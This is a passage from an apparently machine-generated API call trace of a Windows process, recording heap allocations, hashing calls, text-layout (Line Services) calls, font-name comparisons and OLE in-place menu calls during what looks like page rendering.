pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.181] HashData (in: pbData=0x6d93dc, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.181] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.182] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.182] LsSetDoc () returned 0x0 [0161.182] LsCreateLine () returned 0x0 [0161.182] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.182] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.182] GetFocus () returned 0x103e2 [0161.182] GetFocus () returned 0x103e2 [0161.182] GetFocus () returned 0x103e2 [0161.183] GetFocus () returned 0x103e2 [0161.183] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.183] LsGetRubyLsimethods () returned 0x0 [0161.183] LsGetTatenakayokoLsimethods () returned 0x0 [0161.183] LsGetHihLsimethods () returned 0x0 [0161.183] LsGetWarichuLsimethods () returned 0x0 [0161.183] LsGetReverseLsimethods () returned 0x0 [0161.183] LsCreateContext () returned 0x0 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x6d9f50 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d80c8 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6d0018 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d83f8 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x6bcb70 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c50 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9c28 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0161.183] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db628 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9980 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9b10 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ac0 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98b8 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x6dd2b8 [0161.184] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.184] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.184] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.184] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x6bce60 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67b048 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdbc0 [0161.184] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6da5c8 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6cb500 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x6ddfb8 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b8c0 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x6de238 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6cd888 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x6bc3d0 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d230 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x6de3d0 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64ae30 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x6de570 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdcd8 [0161.185] LsSetModWidthPairs () returned 0x0 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f7e90 [0161.185] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc920 [0161.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.186] LsSetBreaking () returned 0x0 [0161.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x6de708 [0161.186] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6d93d8 [0161.186] LsSetDoc () returned 0x0 [0161.186] IOleInPlaceFrame:RemoveMenus (This=0xcfb060, hmenuShared=0x6da0fc) returned 0x0 [0161.186] IOleInPlaceFrame:RemoveMenus (This=0xcfb070, hmenuShared=0x6da0fc) returned 0x0 [0161.186] IOleInPlaceFrame:RemoveMenus (This=0xcfb080, hmenuShared=0x6da0fc) returned 0x0 [0161.186] IOleInPlaceFrame:RemoveMenus (This=0xcfb090, hmenuShared=0x6da0fc) returned 0x0 [0161.186] LsCreateLine () returned 0x0 [0161.186] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.187] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.187] LsQueryLineDup () returned 0x0 [0161.187] LsDestroyLine () returned 0x0 [0161.188] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.188] LsdnFinishRegular () returned 0x0 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="sans-serif") returned -6 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="serif") returned -6 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="monospace") returned 4 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="cursive") returned 10 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="fantasy") returned 7 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="inherit") returned 4 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="initial") returned 4 [0161.188] StrCmpICW (pszStr1="ms sans serif", pszStr2="default") returned 9 [0161.188] MulDiv (nNumber=8000, nNumerator=20, nDenominator=1000) returned 160 [0161.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.190] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0161.190] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0161.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9408 [0161.191] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0161.191] HashData (in: pbData=0x6d940c, cbData=0x4, pbHash=0x6d9410, cbHash=0x2 | out: pbHash=0x6d9410) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e08, cbData=0x2, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e0a, cbData=0x2, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e0c, cbData=0x8, pbHash=0x1981c4, cbHash=0x2 | out: pbHash=0x1981c4) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e14, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e1c, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e24, cbData=0x2, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e26, cbData=0x2, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e28, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e30, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x1981dc, cbData=0x4, pbHash=0x1981c8, cbHash=0x2 | out: pbHash=0x1981c8) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e3c, cbData=0x8, pbHash=0x1981c4, cbHash=0x2 | out: pbHash=0x1981c4) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e44, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e50, cbData=0x4, pbHash=0x1981c4, cbHash=0x2 | out: pbHash=0x1981c4) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e54, cbData=0x8, pbHash=0x1981c4, cbHash=0x2 | out: pbHash=0x1981c4) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e5c, cbData=0x8, pbHash=0x1981b0, cbHash=0x2 | out: pbHash=0x1981b0) returned 0x0 [0161.191] HashData (in: pbData=0x6d7e68, cbData=0x4, pbHash=0x1981c4, cbHash=0x2 | out: pbHash=0x1981c4) returned 0x0 [0161.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7e08 | out: hHeap=0x5e0000) returned 1 [0161.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9408 | out: hHeap=0x5e0000) returned 1 [0161.192] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.192] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.192] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.192] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x19822c, cbHash=0x2 | out: pbHash=0x19822c) returned 0x0 [0161.192] HashData (in: pbData=0x198244, cbData=0x4, pbHash=0x19822c, cbHash=0x2 | out: pbHash=0x19822c) returned 0x0 [0161.192] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x198248, cbHash=0x2 | out: pbHash=0x198248) returned 0x0 [0161.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0161.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0161.192] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.192] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0161.192] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9408 [0161.193] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0161.193] HashData (in: pbData=0x6d940c, cbData=0x4, pbHash=0x6d9410, cbHash=0x2 | out: pbHash=0x6d9410) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x1988bc, cbHash=0x2 | out: pbHash=0x1988bc) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x1988d4, cbData=0x4, pbHash=0x1988c0, cbHash=0x2 | out: pbHash=0x1988c0) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x1988bc, cbHash=0x2 | out: pbHash=0x1988bc) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x1988bc, cbHash=0x2 | out: pbHash=0x1988bc) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x1988bc, cbHash=0x2 | out: pbHash=0x1988bc) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x1988a8, cbHash=0x2 | out: pbHash=0x1988a8) returned 0x0 [0161.193] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x1988bc, cbHash=0x2 | out: pbHash=0x1988bc) returned 0x0 [0161.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0161.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9408 | out: hHeap=0x5e0000) returned 1 [0161.193] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x1988c4, cbHash=0x2 | out: pbHash=0x1988c4) returned 0x0 [0161.193] HashData (in: pbData=0x1988dc, cbData=0x4, pbHash=0x1988c4, cbHash=0x2 | out: pbHash=0x1988c4) returned 0x0 [0161.193] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x1988e0, cbHash=0x2 | out: pbHash=0x1988e0) returned 0x0 [0161.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0161.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.194] LsSetDoc () returned 0x0 [0161.194] LsCreateLine () returned 0x0 [0161.196] LsQueryLineDup () returned 0x0 [0161.196] LsDestroyLine () returned 0x0 [0161.196] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.196] LsdnFinishRegular () returned 0x0 [0161.196] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.197] LsQueryLineDup () returned 0x0 [0161.197] IOleInPlaceFrame:SetMenu (This=0xd0f420, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.197] IOleInPlaceFrame:SetMenu (This=0xd0f400, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0161.197] LsQueryLineCpPpoint () returned 0x0 [0161.197] LsQueryLineCpPpoint () returned 0x0 [0161.197] LsDestroyLine () returned 0x0 [0161.197] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.198] LsDestroyContext () returned 0x0 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d0018 | out: hHeap=0x5e0000) returned 1 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d80c8 | out: hHeap=0x5e0000) returned 1 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bcb70 | out: hHeap=0x5e0000) returned 1 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d83f8 | out: hHeap=0x5e0000) returned 1 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c50 | out: hHeap=0x5e0000) returned 1 [0161.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c28 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db628 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9b10 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9980 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ac0 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98b8 | out: hHeap=0x5e0000) returned 1 [0161.199] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd2b8 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bce60 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67b048 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdbc0 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da5c8 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb500 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b8c0 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de238 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cd888 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc920 | out: hHeap=0x5e0000) returned 1 [0161.200] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f7e90 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de708 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de3d0 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ae30 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de570 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d230 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bc3d0 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdcd8 | out: hHeap=0x5e0000) returned 1 [0161.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f50 | out: hHeap=0x5e0000) returned 1 [0161.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d93d8 [0161.202] HashData (in: pbData=0x6d93d8, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.202] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.202] HashData (in: pbData=0x6d93dc, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.202] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.202] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d93d8 [0161.202] HashData (in: pbData=0x6d93d8, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.202] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.202] HashData (in: pbData=0x6d93dc, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.202] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.203] LsSetDoc () returned 0x0 [0161.203] LsCreateLine () returned 0x0 [0161.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.203] GetFocus () returned 0x103e2 [0161.203] GetFocus () returned 0x103e2 [0161.203] GetFocus () returned 0x103e2 [0161.204] GetFocus () returned 0x103e2 [0161.204] LsdnFinishRegular () returned 0x0 [0161.204] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.207] LsdnFinishRegular () returned 0x0 [0161.207] LsQueryLineDup () returned 0x0 [0161.207] IOleInPlaceFrame:SetMenu (This=0xd0f480, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.208] IOleInPlaceFrame:SetMenu (This=0xd0f460, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0161.208] LsQueryLineCpPpoint () returned 0x0 [0161.208] LsQueryLineCpPpoint () returned 0x0 [0161.208] LsDestroyLine () returned 0x0 [0161.208] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.208] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c30 [0161.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d93d8 [0161.209] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0161.209] HashData (in: pbData=0x6d93dc, cbData=0x4, pbHash=0x6d93e0, cbHash=0x2 | out: pbHash=0x6d93e0) returned 0x0 [0161.209] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x199dac, cbHash=0x2 | out: pbHash=0x199dac) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x199dc4, cbData=0x4, pbHash=0x199db0, cbHash=0x2 | out: pbHash=0x199db0) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x199dac, cbHash=0x2 | out: pbHash=0x199dac) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x199dac, cbHash=0x2 | out: pbHash=0x199dac) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x199dac, cbHash=0x2 | out: pbHash=0x199dac) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x199d98, cbHash=0x2 | out: pbHash=0x199d98) returned 0x0 [0161.209] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x199dac, cbHash=0x2 | out: pbHash=0x199dac) returned 0x0 [0161.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0161.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.210] HashData (in: pbData=0x9ee6c30, cbData=0x1, pbHash=0x199db4, cbHash=0x2 | out: pbHash=0x199db4) returned 0x0 [0161.210] HashData (in: pbData=0x199dcc, cbData=0x4, pbHash=0x199db4, cbHash=0x2 | out: pbHash=0x199db4) returned 0x0 [0161.210] HashData (in: pbData=0x9ee6c34, cbData=0x4, pbHash=0x199dd0, cbHash=0x2 | out: pbHash=0x199dd0) returned 0x0 [0161.210] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c30 | out: hHeap=0x5e0000) returned 1 [0161.210] GetFocus () returned 0x103e2 [0161.210] GetFocus () returned 0x103e2 [0161.210] LsSetDoc () returned 0x0 [0161.210] LsCreateLine () returned 0x0 [0161.232] LsDestroyLine () returned 0x0 [0161.233] LoadStringW (in: hInstance=0x6d6d0000, uID=0x1fe9, lpBuffer=0x199f68, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0161.233] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8598 | out: hHeap=0x5e0000) returned 1 [0161.233] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb4a0 | out: hHeap=0x5e0000) returned 1 [0161.233] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5e24c0, Size=0xe) returned 0x6d93d8 [0161.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.234] 